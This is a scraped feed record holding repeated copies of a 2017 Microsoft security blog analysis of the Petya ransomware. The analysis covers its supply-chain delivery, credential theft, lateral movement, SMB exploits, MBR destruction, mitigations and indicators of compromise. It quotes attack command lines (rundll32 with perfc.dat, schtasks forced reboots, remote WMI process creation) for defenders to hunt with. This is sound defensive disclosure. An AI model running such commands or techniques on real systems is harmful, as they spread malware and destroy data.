Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. 
Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offer machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ under a different filename, and the creation of the _perfc.dat_ file in remote share (UNC) paths.\n\nToday, without the need for additional updates, an infected machine may look like this:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-windows-defender-ATP1.png)\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-windows-defender-ATP2.png)\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In the Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. 
Windows 10 S users are further protected from this threat.\n\nWe recommend customers who have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be advisable for a very short period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). 
Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 
x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File Indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command Lines**\n\nIn environments where command-line logging is available, the following 
command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;\n * cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * \u201cprocess call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\u201d\n\nNetwork indicators\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "lastseen": "2017-06-30T15:02:19", "modified": "2017-06-28T06:57:43", "objectVersion": "1.4", "published": "2017-06-28T06:57:43", "references": [], "reporter": "msft-mmpc", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "viewCount": 4}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-06-30T15:02:19"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. 
We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. 
You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. 
GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that the _EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/129.png)\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs), which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities, it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions open across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. 
A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary to the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute the malware remotely using either the PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored in the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic), it uses that credential to propagate through the network.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-access-admin.png)\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. 
It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-wmic.png)\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-packet.png)\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-packet-2.png)\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). 
However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-encryption-1.png)\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-exploit-udpate.png)\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-MBR-overwrite-udpate.png)\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. 
For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-fake-message.png)\n\nIt then displays this ransom note:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-ransom-note.png)\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-file-mapping-API.png)\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. 
Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-rsa-public-encryption-key.png)\n\n_Embedded RSA public key_\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-aes-128-key.png)\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-infect-mbr.png)\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-readme.png)\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. 
Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offers machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with different filename, and the creation of the _perfc.dat_ file in remote shares (UNC) paths.\n\nToday, without the need of additional updates, an infected machine may look like this:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-windows-defender-ATP1.png)\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-windows-defender-ATP2.png)\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. 
Windows 10 S users are further protected from this threat.\n\nWe recommend customers who have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be advisable for a very short period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy itself to and execute on remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. 
Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. 
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 
x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which 
captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\"_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "lastseen": "2017-07-14T04:03:11", "modified": "2017-06-28T06:57:43", "objectVersion": "1.4", "published": "2017-06-28T06:57:43", "references": [], "reporter": "msft-mmpc", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "viewCount": 6}, "differentElements": ["description"], "edition": 3, "lastseen": "2017-07-14T04:03:11"}], "modified": "2017-06-28T06:57:43", "lastseen": "2017-09-15T09:08:41", "published": "2017-06-28T06:57:43", "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>). 
Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. 
You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the 